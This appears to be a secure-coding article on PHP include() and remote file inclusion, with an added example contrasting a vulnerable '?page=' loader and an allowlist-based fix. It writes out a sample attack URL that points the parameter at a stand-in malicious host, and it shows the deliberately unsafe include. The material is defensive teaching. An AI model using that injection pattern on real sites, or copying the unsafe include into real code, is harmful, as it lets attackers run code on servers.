The include() command is a powerful piece of PHP that grabs remote or local content and literally "includes" it in your PHP program. It makes a network or filesystem request for the target, and whatever comes back is inserted into your own code before the PHP parser runs it. There are special Network Security caveats to using this command: misused, it can compromise your web page, your website, your databases, or your entire web server.
Network Security is a major issue often overlooked by web designers, database developers, and even PHP programmers. Especially if you have a database with critical information, you must adhere to the rules of Network Security to protect yourself, your server, and your clients.
Since the include() command literally inserts remote code into your own, and that code is then processed by your web server's PHP parser, you must be able to trust the remote source completely. The naive expectation is that the remote content will be simple HTML or plain text. One would assume that including a remote PHP script only retrieves its processed output, which is ordinarily plain HTML. The problem is that a remote HTML, text, or PHP page can produce output containing PHP tags, and your own script then treats that output as executable PHP code.
If your PHP Code includes executable PHP Code, it will be processed by your own web server’s PHP Parser, and that spells trouble. If the included PHP Code is a Trojan Horse, or similarly damaging script, your web server will become compromised. If the included PHP Code contains scripts to read/write files, it might explore your web server for whatever is available, perhaps sending it out to the hacker or other external locations. The included PHP Code might be a mailer script that starts a spam campaign, using your web server as the source and getting you blacklisted.
Included PHP code is capable of rewriting all of your web pages, one by one, to include some other form of malicious code. It might write a few lines to the top or bottom of every web page, to be processed every time the page is viewed by a user. Whether that code targets the user or your server, it is likely going to be bad.
The include() command can be used effectively and safely, provided you are aware of the many Network Security issues it can create and you take precautions. DO NOT TRUST everyone, and beware of all external sources. Don’t think you have all the bases covered until you understand Network Security well enough to make that decision.
CAVEATS: Define your include parameters in your own PHP code and DO NOT let external sources define them for you. If you let a GET or POST variable name the include target, users can point that target at malicious PHP code. Sites that dynamically link to content through a GET variable (e.g. http://www.domain.com/index.php?page=contact.php) can be made to include malicious code simply by changing the value (http://www.domain.com/index.php?page=http://www.php-death.com/super-bad-code.php). Restrict the set of paths include() may ever receive, and filter out illegal characters before anything reaches the PHP parser. There are almost always other include() caveats to be aware of, so don't jump in until you know it's safe.
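The following is an added example, not code from the original article: the dynamic `?page=` pattern described above, first written the unsafe way, then hardened so the include target is always chosen by your own code. The `pages/` directory, the page names in the allowlist, and the function names are assumptions for illustration.

```php
<?php
// UNSAFE: the GET parameter names the include target directly, so a request
// such as the article's ?page=http://www.php-death.com/super-bad-code.php
// would be fetched and executed by your own PHP parser.
function unsafe_page(): void
{
    include $_GET['page'];
}

// HARDENED: $_GET['page'] is only a key into a fixed allowlist that your code
// controls. Remote URLs, "../" traversal, null bytes, or any name not listed
// here never reach include() at all.
// (Assumed layout: pages live in a pages/ directory beside this script.)
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
    'about'   => 'about.php',
];

function resolve_page(string $requested, string $base = __DIR__ . '/pages'): ?string
{
    // Reject anything outside the allowlist before touching the filesystem.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $realBase = realpath($base);
    $path     = realpath($base . '/' . PAGES[$requested]);
    // realpath() resolves symlinks and "..", so confirm the final file still
    // lives under the intended directory (defence in depth for the allowlist).
    if ($realBase === false || $path === false
        || strpos($path, $realBase . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function safe_page(): void
{
    $path = resolve_page($_GET['page'] ?? 'home');
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Server-side backstop: with allow_url_include=Off in php.ini (the default),
// include() refuses http:// and ftp:// targets even if a bug lets one through.
safe_page();
```

The allowlist is the real control here; the `realpath()` check and the `allow_url_include` setting only limit the damage if the allowlist is ever bypassed or misconfigured.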